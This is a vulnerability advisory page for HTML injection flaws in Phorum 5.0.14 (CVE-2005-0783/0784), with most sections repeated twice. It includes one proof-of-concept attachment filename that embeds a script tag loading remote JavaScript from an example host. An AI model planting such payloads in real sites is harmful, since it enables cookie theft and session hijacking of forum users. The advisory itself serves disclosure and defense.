Phorum Multiple Subject and Attachment HTML Injection Vulnerabilities
BID:12800
Info
Phorum Multiple Subject and Attachment HTML Injection Vulnerabilities
| Bugtraq ID: | 12800 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0784 CVE-2005-0783 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 14 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Discovery of this vulnerability is credited to Jon Oberheide <[email protected]>. |
| Vulnerable: |
Phorum Phorum 5.0.14 |
| Not Vulnerable: | |
Discussion
Phorum Multiple Subject and Attachment HTML Injection Vulnerabilities
Phorum is reportedly affected by multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.
The attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
These issues are reported to affect Phorum 5.0.14; earlier versions may also be affected.
Phorum is reportedly affected by multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.
The attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
These issues are reported to affect Phorum 5.0.14; earlier versions may also be affected.
Exploit / POC
Phorum Multiple Subject and Attachment HTML Injection Vulnerabilities
No exploit is required.
The following proof of concept demonstrates a filename suitable for an attachment:
test<script language='Javascript' src='http:&#47;&#47;www.example.com&#47;test.js'>.txt
No exploit is required.
The following proof of concept demonstrates a filename suitable for an attachment:
test<script language='Javascript' src='http:&#47;&#47;www.example.com&#47;test.js'>.txt
Solution / Fix
Phorum Multiple Subject and Attachment HTML Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Phorum Multiple Subject and Attachment HTML Injection Vulnerabilities
References:
References:
- Phorum Homepage (Phorum)
- [Full-disclosure] 3 XSS Vulnerabilities in Phorum <= 5.0.14 (Jon Oberheide